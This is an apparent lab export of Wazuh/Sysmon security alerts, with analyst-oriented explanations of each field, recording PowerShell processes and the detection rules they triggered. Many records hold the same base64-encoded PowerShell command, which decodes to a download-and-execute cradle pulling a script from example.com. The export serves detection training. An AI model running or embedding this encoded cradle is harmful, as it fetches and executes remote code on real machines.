data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd0d-680a-1d0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9884 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 49 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534231.1327005 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:06.2915982Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283458 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:06.270
ProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ProcessId: 8832
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5pbr2kjg.zae.ps1
CreationUtcTime: 2025-04-24 22:37:06.270
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:06.270 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5pbr2kjg.zae.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:06.270 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 46 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534232.1329770 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:09.0167902Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283484 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:07.666
ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ProcessId: 11044
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00}
ParentProcessId: 8832
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:07.666 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 50 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534232.1337837 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:09.2215671Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283487 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:09.193
ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ProcessId: 11044
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vpgzfelx.hvu.ps1
CreationUtcTime: 2025-04-24 22:37:09.193
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:09.193 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vpgzfelx.hvu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:09.193 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 47 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534234.1340606 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:12.5940581Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283514 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:10.461
ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ProcessId: 13184
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ParentProcessId: 11044
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:10.461 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 51 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
